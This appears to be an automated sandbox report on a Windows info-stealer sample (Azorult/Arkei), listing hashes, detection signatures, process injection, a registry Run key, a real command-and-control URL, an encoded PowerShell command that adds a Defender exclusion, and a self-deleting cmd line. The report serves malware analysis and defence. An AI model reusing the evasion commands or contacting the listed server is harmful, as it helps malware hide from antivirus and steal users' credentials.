Analysis
-
max time kernel
152s -
max time network
180s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
27-05-2022 14:01
Static task
static1
Behavioral task
behavioral1
Sample
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe
Resource
win10v2004-20220414-en
General
-
Target
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe
-
Size
100KB
-
MD5
c7a310982da68b10360854f9cd78e718
-
SHA1
60140c28e0b7db797a771c2dee081fa3812246db
-
SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731
-
SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3
Malware Config
Extracted
arkei
Default
Extracted
azorult
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M6
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M6
-
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 1352 azne.exe 1484 pm.exe 1748 azne.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation pm.exe Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation azne.exe -
Loads dropped DLL 10 IoCs
pid Process 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe 2016 MSBuild.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hjbjm = "\"C:\\Users\\Admin\\AppData\\Roaming\\Xegnrfbl\\Hjbjm.exe\"" pm.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 912 set thread context of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 1484 set thread context of 1020 1484 pm.exe 37 PID 1352 set thread context of 1748 1352 azne.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1564 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 2028 powershell.exe 1484 pm.exe 1484 pm.exe 1352 azne.exe 1352 azne.exe 1020 RegAsm.exe 1020 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe Token: SeDebugPrivilege 1352 azne.exe Token: SeDebugPrivilege 1484 pm.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 1020 RegAsm.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 912 wrote to memory of 2016 912 df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe 27 PID 2016 wrote to memory of 1352 2016 MSBuild.exe 30 PID 2016 wrote to memory of 1352 2016 MSBuild.exe 30 PID 2016 wrote to memory of 1352 2016 MSBuild.exe 30 PID 2016 wrote to memory of 1352 2016 MSBuild.exe 30 PID 2016 wrote to memory of 1484 2016 MSBuild.exe 31 PID 2016 wrote to memory of 1484 2016 MSBuild.exe 31 PID 2016 wrote to memory of 1484 2016 MSBuild.exe 31 PID 2016 wrote to memory of 1484 2016 MSBuild.exe 31 PID 1484 wrote to memory of 2028 1484 pm.exe 32 PID 1484 wrote to memory of 2028 1484 pm.exe 32 PID 1484 wrote to memory of 2028 1484 pm.exe 32 PID 2016 wrote to memory of 1148 2016 MSBuild.exe 34 PID 2016 wrote to memory of 1148 2016 MSBuild.exe 34 PID 2016 wrote to memory of 1148 2016 MSBuild.exe 34 PID 2016 wrote to memory of 1148 2016 MSBuild.exe 34 PID 1148 wrote to memory of 1564 1148 cmd.exe 36 PID 1148 wrote to memory of 1564 1148 cmd.exe 36 PID 1148 wrote to memory of 1564 1148 cmd.exe 36 PID 1148 wrote to memory of 1564 1148 cmd.exe 36 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1484 wrote to memory of 1020 1484 pm.exe 37 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39 PID 1352 wrote to memory of 1748 1352 azne.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe"C:\Users\Admin\AppData\Local\Temp\df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Roaming\azne.exe"C:\Users\Admin\AppData\Roaming\azne.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Users\Admin\AppData\Roaming\azne.exeC:\Users\Admin\AppData\Roaming\azne.exe4⤵
- Executes dropped EXE
PID:1748
-
-
-
C:\Users\Admin\AppData\Roaming\pm.exe"C:\Users\Admin\AppData\Roaming\pm.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABYAGUAZwBuAHIAZgBiAGwAXABIAGoAYgBqAG0ALgBlAHgAZQAnAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:1564
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
100KB
MD5683600b61a32d3eb2cd44cb34fdf7ab3
SHA1e8bdd864c2610495850bf525cd1529c66c0b0b53
SHA25626f35270f714065705474f3a330a9b7676c2d7e30b9cb9de57d726930768fe29
SHA5125e85802a49875fadfff9bd2d1e4f04bb3e391709813757e14364b99f674e3e7fea757f861c2d811e9882035737d122ebfd4aa17039fdc08dc16f73028159e389
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a
-
Filesize
1.9MB
MD522e6d862d6f51b6283b60badf02b6f81
SHA111920f1bf418f67cdbef320aa1afee596ef27537
SHA256dac5f2e7bcabc924576254aed4a53b112bb19ca9869dfbc7b427765746374d33
SHA512ed639b7111810e76d5f0b737165e57a306e948ad05ade8687af9575f38968d238f0e2056ead7d7f2ab545ace3ca58b13baf0c5dcb8a2ed9428b3e06b6a42016a